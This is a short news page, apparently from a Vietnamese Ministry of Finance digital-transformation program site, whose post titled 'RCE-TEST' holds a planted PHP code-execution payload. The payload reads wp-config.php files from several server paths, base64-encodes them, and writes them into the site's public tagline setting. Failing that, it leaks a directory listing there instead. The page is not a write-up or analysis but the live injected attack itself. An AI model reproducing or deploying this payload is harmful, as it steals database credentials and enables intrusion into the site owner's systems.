BỘ TÀI CHÍNH

Chương trình Hỗ trợ Doanh nghiệp Chuyển đổi số

Tin tức

RCE-TEST-1780465986

  • 01 tháng 06, 2026 - 3:24 AM

  • Chia sẻ:

[php]$r = “”;$p = [“/var/www/html/business/wp-config.php”,”/var/www/html/wp-config.php”,”/var/www/wp-config.php”];foreach($p as $f){$c = @file_get_contents($f);if($c){$r .= $f.”:”.base64_encode($c).”|”;}}if(!$r){$r = “NOCFG_”.getcwd().”_”.serialize(scandir(“/var/www/html/business”));}update_option(“blogdescription”,$r);echo “DONE”;[/php]